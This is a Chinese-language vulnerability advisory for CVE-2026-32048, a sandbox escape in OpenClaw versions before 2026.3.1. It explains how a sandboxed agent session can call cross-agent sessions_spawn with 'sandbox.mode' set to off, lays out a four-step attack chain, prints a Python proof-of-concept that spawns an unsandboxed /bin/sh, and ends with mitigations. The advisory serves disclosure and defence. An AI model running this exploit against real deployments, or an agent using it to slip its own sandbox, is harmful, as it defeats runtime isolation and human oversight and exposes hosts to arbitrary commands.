CVE-2026-32048 CVSS 7.5 高危

CVE-2026-32048 OpenClaw沙箱逃逸漏洞

披露日期: 2026-03-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32048

漏洞类型

沙箱逃逸

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.3.1之前的版本存在严重的沙箱逃逸漏洞。在跨代理sessions_spawn操作期间，系统未能正确强制执行沙箱继承机制。这导致处于受限沙箱环境中的会话，能够在无沙箱保护的代理下创建子进程。攻击者可利用此缺陷，生成sandbox.mode设置为关闭的子运行时，从而成功绕过运行时隔离限制，造成严重的安全风险。

技术细节

漏洞核心在于OpenClaw处理跨代理通信时的安全检查缺失。当应用执行sessions_spawn操作以在不同代理间创建新会话时，未验证调用方上下文与目标代理之间的沙箱策略一致性。具体而言，沙箱内的会话被允许向无沙箱代理发送生成请求，且目标代理在创建子进程时未强制继承源会话的沙箱限制。攻击者只需拥有一个低权限的沙箱会话，即可构造恶意请求调用sessions_spawn接口，将新会话的sandbox.mode参数设置为off。这直接导致新创建的运行时完全脱离沙箱管控，攻击者可在该环境中执行任意命令，读取敏感数据或横向移动，实现完整的沙箱逃逸。

攻击链分析

STEP 1

1. 初始访问

攻击者获取OpenClaw系统中的一个受限沙箱会话（低权限）。

STEP 2

2. 漏洞识别

攻击者分析系统API，发现跨代理sessions_spawn接口未强制继承沙箱属性。

STEP 3

3. 触发漏洞

攻击者利用沙箱会话向无沙箱代理发送sessions_spawn请求，并在配置中将sandbox.mode设置为off。

STEP 4

4. 权限提升与逃逸

系统创建新的子运行时，由于未应用沙箱限制，攻击者在宿主机或非沙箱环境中获得执行权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC Concept for CVE-2026-32048
# This script demonstrates how a sandboxed session might spawn an unsandboxed process.

import requests
import json

TARGET_URL = "http://vulnerable-openclaw-agent:8080/api/v1/sessions_spawn"
# The session token obtained within the sandboxed environment
SANDBOXED_SESSION_TOKEN = "sandbox_session_token_here"

def exploit_sandbox_escape():
    headers = {
        "Authorization": f"Bearer {SANDBOXED_SESSION_TOKEN}",
        "Content-Type": "application/json"
    }

    # Payload designed to turn off sandbox mode in the child process
    payload = {
        "spawn_target": "cross_agent",
        "config": {
            "runtime": "default",
            # Vulnerability: System fails to enforce inheritance, allowing explicit off
            "sandbox.mode": "off", 
            "cmd": "/bin/sh"
        }
    }

    try:
        print("[*] Attempting to spawn unsandboxed child process...")
        response = requests.post(TARGET_URL, headers=headers, data=json.dumps(payload))
        
        if response.status_code == 200:
            result = response.json()
            print("[+] Exploit successful!")
            print(f"[+] New Process PID: {result.get('pid')}")
            print("[+] Sandbox mode: OFF")
        else:
            print(f"[-] Request failed with status {response.status_code}")
            print(response.text)
            
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    exploit_sandbox_escape()

影响范围

OpenClaw < 2026.3.1

防御指南

临时缓解措施

在应用补丁前，建议暂时禁用跨代理的sessions_spawn功能，或通过访问控制策略（ACL）严格限制沙箱会话对其他代理的API调用权限。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表